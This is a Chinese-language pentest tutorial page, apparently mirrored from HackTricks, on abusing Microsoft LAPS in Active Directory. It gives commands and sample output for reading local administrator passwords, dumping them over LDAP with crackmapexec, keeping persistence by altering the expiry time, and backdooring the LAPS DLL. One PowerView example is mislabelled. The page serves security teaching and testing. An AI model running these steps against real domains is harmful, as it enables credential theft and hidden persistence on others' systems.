Mirrors/hacktricks
2
0
Fork 0
mirror of https://github.com/carlospolop/hacktricks synced 2024-11-23 13:13:41 +00:00
Code Issues Projects Releases Packages Wiki Activity
hacktricks/windows-hardening/active-directory-methodology/laps.md
Translator workflow a21a0e7217 Translated to Chinese
2023-08-03 19:12:22 +00:00

9 KiB
Raw Blame History

LAPS

☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥

基本信息

LAPS允许您在加入域的计算机上管理本地管理员密码(该密码是随机的、唯一的,并且定期更改。这些密码在Active Directory中进行集中存储并使用ACLs限制授权用户。密码在客户端到服务器的传输中使用Kerberos v5和AES进行保护。

使用LAPS时域中的计算机对象中会出现2个新属性ms-mcs-AdmPwdms-mcs-AdmPwdExpirationTime。这些属性包含明文管理员密码和过期时间。因此,在域环境中,检查哪些用户可以读取这些属性可能是有趣的。

检查是否已激活

reg query "HKLM\Software\Policies\Microsoft Services\AdmPwd" /v AdmPwdEnabled

dir "C:\Program Files\LAPS\CSE"
# Check if that folder exists and contains AdmPwd.dll

# Find GPOs that have "LAPS" or some other descriptive term in the name
Get-DomainGPO | ? { $_.DisplayName -like "*laps*" } | select DisplayName, Name, GPCFileSysPath | fl

# Search computer objects where the ms-Mcs-AdmPwdExpirationTime property is not null (any Domain User can read this property)
Get-DomainObject -SearchBase "LDAP://DC=sub,DC=domain,DC=local" | ? { $_."ms-mcs-admpwdexpirationtime" -ne $null } | select DnsHostname

LAPS密码访问

您可以从\\dc\SysVol\domain\Policies\{4A8A4E8E-929F-401A-95BD-A7D40E0976C8}\Machine\Registry.pol下载原始的LAPS策略文件然后使用GPRegistryPolicyParser软件包中的**Parse-PolFile**将该文件转换为可读的格式。

此外,如果我们可以访问的机器上安装了本机LAPS PowerShell cmdlets,我们也可以使用它们:

Get-Command *AdmPwd*

CommandType     Name                                               Version    Source
-----------     ----                                               -------    ------
Cmdlet          Find-AdmPwdExtendedRights                          5.0.0.0    AdmPwd.PS
Cmdlet          Get-AdmPwdPassword                                 5.0.0.0    AdmPwd.PS
Cmdlet          Reset-AdmPwdPassword                               5.0.0.0    AdmPwd.PS
Cmdlet          Set-AdmPwdAuditing                                 5.0.0.0    AdmPwd.PS
Cmdlet          Set-AdmPwdComputerSelfPermission                   5.0.0.0    AdmPwd.PS
Cmdlet          Set-AdmPwdReadPasswordPermission                   5.0.0.0    AdmPwd.PS
Cmdlet          Set-AdmPwdResetPasswordPermission                  5.0.0.0    AdmPwd.PS
Cmdlet          Update-AdmPwdADSchema                              5.0.0.0    AdmPwd.PS

# List who can read LAPS password of the given OU
Find-AdmPwdExtendedRights -Identity Workstations | fl

# Read the password
Get-AdmPwdPassword -ComputerName wkstn-2 | fl

PowerView 也可以用来查找谁可以读取密码并读取它

# Find the principals that have ReadPropery on ms-Mcs-AdmPwd
Get-AdmPwdPassword -ComputerName wkstn-2 | fl

# Read the password
Get-DomainObject -Identity wkstn-2 -Properties ms-Mcs-AdmPwd

LAPSToolkit

LAPSToolkit是一个工具包用于枚举启用了LAPS的计算机。它具有多个功能。
其中之一是解析所有启用了LAPS的计算机的ExtendedRights。这将显示专门被授权读取LAPS密码的组,通常是受保护组中的用户。
加入计算机到域的账户会在该主机上获得All Extended Rights,这个权限赋予了该账户读取密码的能力。枚举可能会显示一个可以在主机上读取LAPS密码的用户账户。这可以帮助我们针对特定的AD用户他们可以读取LAPS密码。

# Get groups that can read passwords
Find-LAPSDelegatedGroups

OrgUnit                                           Delegated Groups
-------                                           ----------------
OU=Servers,DC=DOMAIN_NAME,DC=LOCAL                DOMAIN_NAME\Domain Admins
OU=Workstations,DC=DOMAIN_NAME,DC=LOCAL           DOMAIN_NAME\LAPS Admin

# Checks the rights on each computer with LAPS enabled for any groups
# with read access and users with "All Extended Rights"
Find-AdmPwdExtendedRights
ComputerName                Identity                    Reason
------------                --------                    ------
MSQL01.DOMAIN_NAME.LOCAL    DOMAIN_NAME\Domain Admins   Delegated
MSQL01.DOMAIN_NAME.LOCAL    DOMAIN_NAME\LAPS Admins     Delegated

# Get computers with LAPS enabled, expirations time and the password (if you have access)
Get-LAPSComputers
ComputerName                Password       Expiration
------------                --------       ----------
DC01.DOMAIN_NAME.LOCAL      j&gR+A(s976Rf% 12/10/2022 13:24:41

使用Crackmapexec倾泻LAPS密码

如果没有访问powershell的权限您可以通过LDAP远程滥用此特权方法是使用

crackmapexec ldap 10.10.10.10 -u user -p password --kdcHost 10.10.10.10 -M laps

这将导出用户可以读取的所有密码,使您能够以不同的用户获得更好的立足点。

LAPS持久性

过期日期

一旦成为管理员,可以通过将过期日期设置为未来来获得密码并阻止机器更新密码。

# Get expiration time
Get-DomainObject -Identity computer-21 -Properties ms-mcs-admpwdexpirationtime

# Change expiration time
## It's needed SYSTEM on the computer
Set-DomainObject -Identity wkstn-2 -Set @{"ms-mcs-admpwdexpirationtime"="232609935231523081"}

{% hint style="warning" %} 如果管理员使用**Reset-AdmPwdPassword命令或启用了LAPS GPO中的不允许密码过期时间超过策略要求**选项,密码仍然会被重置。 {% endhint %}

后门

LAPS的原始源代码可以在这里找到,因此可以在代码中(例如在Main/AdmPwd.PS/Main.csGet-AdmPwdPassword方法中)放置一个后门,以某种方式窃取新密码或将其存储在其他地方

然后,只需编译新的AdmPwd.PS.dll并将其上传到机器的C:\Tools\admpwd\Main\AdmPwd.PS\bin\Debug\AdmPwd.PS.dll(并更改修改时间)。

☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥